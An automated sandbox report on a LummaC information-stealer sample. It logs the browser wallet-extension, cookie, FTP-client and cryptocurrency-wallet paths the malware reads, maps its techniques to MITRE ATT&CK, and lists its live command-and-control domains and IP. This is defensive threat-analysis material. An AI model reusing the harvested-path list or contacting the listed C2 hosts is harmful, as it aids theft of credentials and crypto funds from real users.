Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior

Source: Yara match	File source: 00000002.00000003.1714086853.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1714011851.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1714130661.0000000002D9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 7332, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 7332, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.binstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	241 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	231 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	231 Virtualization/Sandbox Evasion	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	33 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Patcher_I5cxa9AN.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\gdi32.dll	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://cureprouderio.click/$&%W&	100%	Avira URL Cloud	malware
https://cureprouderio.click/	100%	Avira URL Cloud	malware
https://cureprouderio.click/api9	100%	Avira URL Cloud	malware
https://cureprouderio.click/pi	100%	Avira URL Cloud	malware
https://cureprouderio.click/bu	100%	Avira URL Cloud	malware
https://cureprouderio.click/api(	100%	Avira URL Cloud	malware
https://cureprouderio.click/gg	100%	Avira URL Cloud	malware
cureprouderio.click	100%	Avira URL Cloud	malware
https://cureprouderio.click/jh	100%	Avira URL Cloud	malware
https://cureprouderio.click/api	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cureprouderio.click	172.67.132.7	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
cureprouderio.click	true	Avira URL Cloud: malware	unknown
rabidcowse.shop	false		high
wholersorie.shop	false		high
cloudewahsj.shop	false		high
noisycuttej.shop	false		high
nearycrepso.shop	false		high
https://cureprouderio.click/api	true	Avira URL Cloud: malware	unknown
framekgirus.shop	false		high
tirepublicerj.shop	false		high
abruptyopsn.shop	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cureprouderio.click/api9	aspnet_regiis.exe, 00000002.00000002.1770259602.0000000002DA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736047907.0000000002DB2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	aspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cureprouderio.click/$&%W&	aspnet_regiis.exe, 00000002.00000002.1770259602.0000000002DA3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	aspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	aspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cureprouderio.click/api(	aspnet_regiis.exe, 00000002.00000003.1672035128.0000000002D46000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cureprouderio.click/	aspnet_regiis.exe, 00000002.00000003.1672075755.0000000002D59000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1712211589.00000000053B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1770621698.00000000053BD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1713958130.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729722312.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cureprouderio.click/jh	aspnet_regiis.exe, 00000002.00000002.1770259602.0000000002DA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736047907.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1713958130.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729722312.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	aspnet_regiis.exe, 00000002.00000003.1673314672.0000000005410000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688210656.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688005128.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688081939.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1673362478.0000000005409000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	aspnet_regiis.exe, 00000002.00000003.1673314672.0000000005410000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688210656.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688005128.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688081939.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1673362478.0000000005409000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	aspnet_regiis.exe, 00000002.00000003.1700242615.00000000054D0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cureprouderio.click/pi	aspnet_regiis.exe, 00000002.00000003.1672035128.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672075755.0000000002D59000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cureprouderio.click/bu	aspnet_regiis.exe, 00000002.00000002.1770259602.0000000002DA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736047907.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	aspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	aspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	aspnet_regiis.exe, 00000002.00000003.1673362478.00000000053E4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	aspnet_regiis.exe, 00000002.00000003.1673314672.0000000005410000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	aspnet_regiis.exe, 00000002.00000003.1673362478.00000000053E4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cureprouderio.click/gg	aspnet_regiis.exe, 00000002.00000003.1672035128.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672075755.0000000002D59000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	aspnet_regiis.exe, 00000002.00000003.1700242615.00000000054D0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	aspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.132.7	cureprouderio.click	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584554
Start date and time:	2025-01-05 20:41:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Patcher_I5cxa9AN.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/2@1/1
EGA Information:	Successful, ratio: 100%
